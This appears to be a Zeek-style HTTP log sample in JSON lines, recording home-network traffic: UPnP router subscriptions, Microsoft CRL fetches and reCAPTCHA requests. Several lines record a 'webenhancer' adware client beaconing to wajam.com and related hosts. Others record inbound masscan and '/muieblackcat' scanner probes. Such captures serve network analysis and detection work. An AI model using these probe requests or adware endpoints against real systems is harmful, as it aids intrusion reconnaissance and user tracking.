+{"ts":"2018-08-03T23:38:56.545165Z","uid":"CJiTeh1FawS7aoetE6","id.orig_h":"192.168.0.53","id.orig_p":2295,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.621127Z","uid":"C5cVHlPhTTxRV9u6e","id.orig_h":"192.168.0.54","id.orig_p":63176,"id.resp_h":"68.232.34.200","id.resp_p":80,"trans_depth":3,"method":"GET","host":"mscrl.microsoft.com","uri":"/pki/mscorp/crl/msitwww2.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.621127Z","uid":"C5cVHlPhTTxRV9u6e","id.orig_h":"192.168.0.54","id.orig_p":63176,"id.resp_h":"68.232.34.200","id.resp_p":80,"trans_depth":2,"method":"GET","host":"mscrl.microsoft.com","uri":"/pki/mscorp/crl/MSIT Machine Auth CA 2(1).crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:56.621127Z","uid":"C5cVHlPhTTxRV9u6e","id.orig_h":"192.168.0.54","id.orig_p":63176,"id.resp_h":"68.232.34.200","id.resp_p":80,"trans_depth":1,"method":"GET","host":"mscrl.microsoft.com","uri":"/pki/mscorp/crl/mswww(6).crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.323675Z","uid":"Cz4VWE1NDP4mrTeL9f","id.orig_h":"192.168.0.53","id.orig_p":3033,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.229703Z","uid":"CVNkJS3g1wUrb1zx2c","id.orig_h":"192.168.0.53","id.orig_p":2790,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.426053Z","uid":"CGoXdX245cEQDVL6R9","id.orig_h":"192.168.0.54","id.orig_p":63918,"id.resp_h":"2.23.159.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.521960Z","uid":"CCnpTf8TO8FS5Qnah","id.orig_h":"192.168.0.53","id.orig_p":3280,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.467398Z","uid":"C5EcsD107mY6mcuEi2","id.orig_h":"192.168.0.51","id.orig_p":44462,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VusXpP2GWtScb_dd6jzaGp7M9ORqg-YjNFkg-aG1mgWOG_vd0rsPZ2kDhu8pKoixa752APsLHyyvpMEz8-LpyS9ha-ySqtAM1FgPvcXGzyTUOy4zcJr-dWXqo5Li88ce37HNewdhoDHNe52_B1o3vOefxM8vXwSEJvij5prOeQGupmM-uGYE6RXbNwtlz81DWqfMQxriu6BIea4_tNgiNztbm65678y4qgNMq06zdOOdvtn4ZBsunxJgqJ2WKup0PEEu6-CK_ZZj3kmXsUSocKg84AnDPQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,QbCw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJerrO0N9W0duI5UdQ","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.407544Z","uid":"CcM1263y05jBdE0bhk","id.orig_h":"192.168.0.53","id.orig_p":3095,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.559280Z","uid":"CLhWYw11zs9ORtBsq","id.orig_h":"192.168.0.51","id.orig_p":44522,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VuuhYhb6Rq9YFEBd-VvZ-5XgT52iUigORR385Vzd5fxE6oMMFudwWzenj6eyAebVAtT95iEmq1sCXzSntSV81eFhu-0D47ivrP1chWxav4ukwr7I-kTBQ4Gq5fvDXcPfGmf5kcX5MRkdGtGmsWcAwtJO-qpafuikG4mcvnKL6EQFnbpYmE_D8Uf-8hmSHXNQCALAJ7tS0VUtW1GcEyrzvNuqs_nKWYsVblmghCTwIzVZo-tTq0mD6rL4qiv3NvZBw8O1At8iGwecGxOZy053DUgRTal-vA\u0026th=,7Ryw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAD2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJc5rO2sUkab6zdqnw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.536258Z","uid":"CRHH9k4lolXjNg3ZW7","id.orig_h":"192.168.0.53","id.orig_p":3307,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.465756Z","uid":"CqIRaw2fmGvcKozY0a","id.orig_h":"192.168.0.53","id.orig_p":3158,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.547216Z","uid":"CZ592H2XZAswBhq0ad","id.orig_h":"192.168.0.54","id.orig_p":64199,"id.resp_h":"23.223.41.68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.644484Z","uid":"CGnAgF3mLhYg3Bx3uk","id.orig_h":"192.168.0.53","id.orig_p":3432,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.644484Z","uid":"CGRAWX1JLOs1SRh8sd","id.orig_h":"192.168.0.54","id.orig_p":64388,"id.resp_h":"23.223.41.68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.708697Z","uid":"CkeUGM1vMF194qqlr4","id.orig_h":"192.168.0.53","id.orig_p":3495,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.708697Z","uid":"COU5qL2ErjLXCWGrol","id.orig_h":"192.168.0.53","id.orig_p":3645,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.749008Z","uid":"Ca7H2a3tVsNC3armcd","id.orig_h":"192.168.0.51","id.orig_p":44590,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VuvnM8aztbavOLbjXPo6ok0DqCKMC8DLh4X9rn5UIZF9h9ffkylCkHcCZhDGjT6ObNRo2HnOSQUxWTV26PenVAH0a1k5Y1nBlYqK-qo4lIAhA_OYmM7tFjqxKtJYIpZylhqZzAxhzZ2HdrAPrY_ff3OSNQASmXTbMfQxZOwVzhvlFJpT_4fr3L-yGONRyNYljAEXA_yZkUTc7HzhomLaMAKHPpiCQdx34hk2tPa38FrZH0aunU1_6L0a8EQuOeeaLSrfZgur73B4aD8Hck-qtXtMTSJSjQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,YpOw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJdSrOtAGHWqtej_Eg","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.891688Z","uid":"CQvLjj1tarENeJAvUi","id.orig_h":"61.240.144.67","id.orig_p":60000,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","uri":"/","user_agent":"masscan/1.0 (https://github.com/robertdavidgraham/masscan)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.746398Z","uid":"CiZQym3PR38kX3PIJl","id.orig_h":"192.168.0.54","id.orig_p":64574,"id.resp_h":"198.199.14.15","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.720776Z","uid":"C0WwbR2W24oQXPUYWi","id.orig_h":"192.168.0.54","id.orig_p":64521,"id.resp_h":"23.223.41.68","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.832218Z","uid":"Cq6Whe25dOCndBoOph","id.orig_h":"192.168.0.51","id.orig_p":44625,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VusUAiLmj-WiHZs5MAt4pUDSDeVooFIh9dGRMpiC3lV_J628TlkOk12dGOAMEsEtZsHn-D5x3Ykx4e8_mpqy3nhw591A-eXauPJrEbKZUcNB9cAyG1IAS5ghO-WPrkmNlPMR4i3terWBkzrqqQfoLHKxx2q-It8cY5vzaEXkL-TR5OhRUwdQEagAtn6iWaNZRxGfHS4CeziFD5lvC8cUKdt-rSqobzh9RuvqJZs-OWAb1wTgzGdLjD-0aUJVi8HRBY_MXDjI7k6wAYxPNQGwi_DeXrs9VA\u0026th=,vE2w0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAC2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJZtrOvvKKdnpxmhVw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.847437Z","uid":"Cgu7YlporjYSPtRQa","id.orig_h":"192.168.0.54","id.orig_p":64796,"id.resp_h":"198.199.14.135","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/injections?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.887918Z","uid":"C7L9i32ACw2FVEcSob","id.orig_h":"192.168.0.53","id.orig_p":3857,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.774361Z","uid":"CPLupn4Jt6jLBFgwW","id.orig_h":"69.197.148.87","id.orig_p":60176,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","host":"95.192.215.175","uri":"/muieblackcat","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.274632Z","uid":"CMMASW23RAEIti8awi","id.orig_h":"192.168.0.53","id.orig_p":2982,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.603621Z","uid":"CeV5cX1sHhgkiPPtw8","id.orig_h":"192.168.0.54","id.orig_p":64304,"id.resp_h":"198.199.14.135","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.technologieduluth.com","uri":"/webenhancer/update?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=\u0026retry_count=0\u0026retry_version=\u0026sc=1\u0026scfr=\u0026avs=0,0,0,0,0,0,0,0,0,0,0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:23.969819Z","uid":"CzVAoP2pcLh5QxLVH4","id.orig_h":"192.168.0.53","id.orig_p":4067,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.965077Z","uid":"CdVAcC2lGSqYDmQKP4","id.orig_h":"192.168.0.53","id.orig_p":4068,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.933908Z","uid":"C887ea171udBjzSVL","id.orig_h":"192.168.0.51","id.orig_p":52302,"id.resp_h":"173.194.40.240","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VuuKc1XAnD7Q4j5mdwYdGHxpt80sUXQXWDcuJoDjLypY1wgO51gQVv7Be6v0DNSUj14gdzkcoQQ-kE9VqQKiHQ0BRyczGEd17qAETJ9jMtkwcUZFCYXX3PBaiPFk8-OZWuZcS8lgfRJumQTskbmTRy_1vA8oP1LJevWAv7Ajf0t5cxaLBLP1KHJg1JA5OxKWHEQLhlDrlpBZLackcV1mCdlnHiC9gOoWjP9SrATQOoutaJj_kL2pUxoKs21u0xDNvKbyzMgM5m8d5NM8cKx_fwBxeT_LfQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,_g-w0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJbVrOgpDpUY2JVxTw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.949111Z","uid":"C887ea171udBjzSVL","id.orig_h":"192.168.0.51","id.orig_p":52302,"id.resp_h":"173.194.40.240","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VutXY2Ch90NwmZGwEiDyfmDQE8x_KqNy2wts5vvNTa9kxzIna3Z1lhmOM2LrHSYLY_aezFe7sVUy0zh8sZVbjxrbNeMTDtCkR7nUGmxQs05pIidtPbNWhGSLiiCMpaRkuY8TxR4wFa8RseEOFtyAPu7olxy_EXzosH_-YdDim2SdtbO44Qw7G1zOy0iBsSV_VB3lyKYO3Cl8p7JJQ9QoxTFQHRthtgDDZT2-KiYRRc5fUcLveMroBIVLiL-OqewKFNBfussEU0AEML-xdz1TPi7R1wXc_w\u0026th=,_Qyw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAD2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJQLrOgpWkQ7Ch47qw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.527296Z","uid":"C0Z3oF3o0qyUUdPUuc","id.orig_h":"192.168.0.54","id.orig_p":65283,"id.resp_h":"198.199.14.10","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.922469Z","uid":"CbQIp51kVwQdAtl8nk","id.orig_h":"192.168.0.53","id.orig_p":4017,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.996553Z","uid":"CSLUjuC4FW0mqd6Nl","id.orig_h":"192.168.0.54","id.orig_p":65119,"id.resp_h":"195.12.232.178","id.resp_p":80,"trans_depth":2,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/MicCodSigPCA_08-31-2010.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.550287Z","uid":"CgIso83oqdS55lmwgh","id.orig_h":"192.168.0.53","id.orig_p":4362,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.641419Z","uid":"CwAGKc4dzqlNfg2Xc2","id.orig_h":"192.168.0.53","id.orig_p":4451,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:58.641419Z","uid":"CI0HZ41BAYHPXj7Hr2","id.orig_h":"192.168.0.51","id.orig_p":44761,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VuuQozJOgvMnk3Y_4Elw3CN2_h9lnd7iwcAYlsX1VhtYzEdff1xMmW01OjU2VvrAtSK9KgxOENpbyTcsQXDEFJ3j0Uh_gq1PVyv2elQgetD5GafRbmp98X1mFfN7Mtrmey1Bhc0WYd0SXDYSq99B9YRWYXTVm40d2sLkOdR45VR6jHRCCabdEscGYiY-UO2np90xCKbn4qFDlXunx7qLg1hjt1KkoRqRxHaY5CWBDlPRmgC5_y1xmaQMA19IX_aKT4nTFMvThuWST7Sljz9D6_5Ya3oN0A\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,q1qw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJGVrOm4byMMaSArzw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:57.952450Z","uid":"C3O79vzkGAJyJF9Yi","id.orig_h":"192.168.0.51","id.orig_p":52308,"id.resp_h":"173.194.40.240","id.resp_p":80,"trans_depth":2,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/image?c=03AHJ_VushQb2LN2WsRpdEybn5tbQM-js5cVVQ9nwxtXkvIgCPkwqHeMJc0I9DJqGZEw0g6xNIl_cgyDjaPQQan4_55JHRjRSvqBp7w5wmdyaowgHPusICuTm2SZl0aKVCiYF8g_WXHH8mF8IZ32iEs7hWWeAEdYbmh3fWrCj4S06yCjKMaMgSEvw2i7ZJuqb8cdMopChY57gIW0YpN83HtNSO2vHgm-4POZmWN_x9lOYxJiQN6azIQ_4mQtGLroz-OBObOzwwNaG4XqCRktvqQVrtv_FuFpHaFA\u0026th=,vUyw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAD2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJf2rOg0sNCqFVKXvg","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[],"resp_fuids":["Fj3EmgGkq9klVBUs2"]} +{"ts":"2018-08-03T23:38:57.999253Z","uid":"C21bXL15y9PPQupJf1","id.orig_h":"192.168.0.51","id.orig_p":52328,"id.resp_h":"173.194.40.240","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_Vuu9ewfGKxf7F2gxyf15quxcdu0gVGrfxSR8BTMuZJb6I81r5aOgcyYM3Dz0P2ltM-DpRatqVv0UCmxGweV_sD0xsMcQgTJ11DDysPJwE9zoZwO20HPGHYE_02rWxkkJiSlNLEcL9ctyzqW1Q2QAHeMPFLGb9o4KqqssmFom_xZEQBp2y-ccazt0tRUyO6insQA2QLsief35quJNMhaIiw2R6_XmwTqUvBm9CBQZfEsxlqgr-hFvFgs18vZXWz3H2h4F6hfF1iFYbG9rSg7qv7OFsRKKEQ\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,6Riw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAF2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJcDrOiER1Qixzt7Nw","referrer":"http://www.barracudacentral.org/lookups/lookup-reputation","user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:59.049982Z","uid":"CqrPJ1VOKyjbHltw1","id.orig_h":"192.168.0.54","id.orig_p":49894,"id.resp_h":"68.232.34.200","id.resp_p":80,"trans_depth":1,"method":"GET","host":"mscrl.microsoft.com","uri":"/pki/mscorp/crl/mswww(6).crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} 